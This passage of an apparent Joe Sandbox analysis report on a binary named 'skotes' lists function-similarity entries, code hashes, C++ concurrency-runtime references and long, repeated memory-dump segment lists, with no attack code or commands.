                                                                                                                                                                                                                                                                • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1182035702-0
                                                                                                                                                                                                                                                                • Opcode ID: 28ed23e63ae80ef6d3635077d4193c14a1f4f2a22eb6ddbee9550333eb98e608
                                                                                                                                                                                                                                                                • Instruction ID: 2f172cf3b62f3cd9411cfe83dab6e50d06a1742a6a92aa8007fb83f58619c0a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28ed23e63ae80ef6d3635077d4193c14a1f4f2a22eb6ddbee9550333eb98e608
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C216D70C14249DADF28DFB4C945AFEBBF8BF14320F200A2DE151A61D2E7718A44CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00AD1B57
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AD1B66
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AD1C2A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                                                                                                • String ID: pContext$switchState
                                                                                                                                                                                                                                                                • API String ID: 2656283622-2660820399
                                                                                                                                                                                                                                                                • Opcode ID: caa0faa7eb91fee7db4b1927c8df1bcf24b7a1322687a16f3a6bdaf4e7f186d9
                                                                                                                                                                                                                                                                • Instruction ID: b2aa6c9fbe6cff7d94d6c0503703e835b95066147ec075af3c57d2f830b9f765
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa0faa7eb91fee7db4b1927c8df1bcf24b7a1322687a16f3a6bdaf4e7f186d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB318535A40214BBCF05EFA4C985EADB7B5FF44324F208567E91297392EB71ED05CA90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcsrchr
                                                                                                                                                                                                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                                                • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                                                • Opcode ID: 8cb324cfc28a59a2f101e7c544f2460a7a85ff296bee77d951833b25b79845ec
                                                                                                                                                                                                                                                                • Instruction ID: 02be716205526687027d01367609e55207d1d693490e1e585aa00eb679facc8e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb324cfc28a59a2f101e7c544f2460a7a85ff296bee77d951833b25b79845ec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01012627728A263567181159DE02BBE37989BC2BB4B26002BFC55FB3C1FF44DC4262A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00ABFB06
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                                                • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 348560076-465693683
                                                                                                                                                                                                                                                                • Opcode ID: de5ae267a8dd86fd4923b559d22883b485f434f44c43aa3acbcccb93896257a5
                                                                                                                                                                                                                                                                • Instruction ID: 681f98977de42657fe2126f44f9acfe4dce08df0236e9dc81f8b825cc4330ea5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de5ae267a8dd86fd4923b559d22883b485f434f44c43aa3acbcccb93896257a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4012D76546719BDA7147BB95E42FFB35DCAF01784725083EB601F3142EE64D80049A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • StructuredWorkStealingQueue.LIBCMT ref: 00AD20B7
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACCAF3: Mailbox.LIBCMT ref: 00ACCB2D
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AD20C8
                                                                                                                                                                                                                                                                • StructuredWorkStealingQueue.LIBCMT ref: 00AD20FE
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AD210F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                                                                                                • String ID: e
                                                                                                                                                                                                                                                                • API String ID: 1411586358-4024072794
                                                                                                                                                                                                                                                                • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
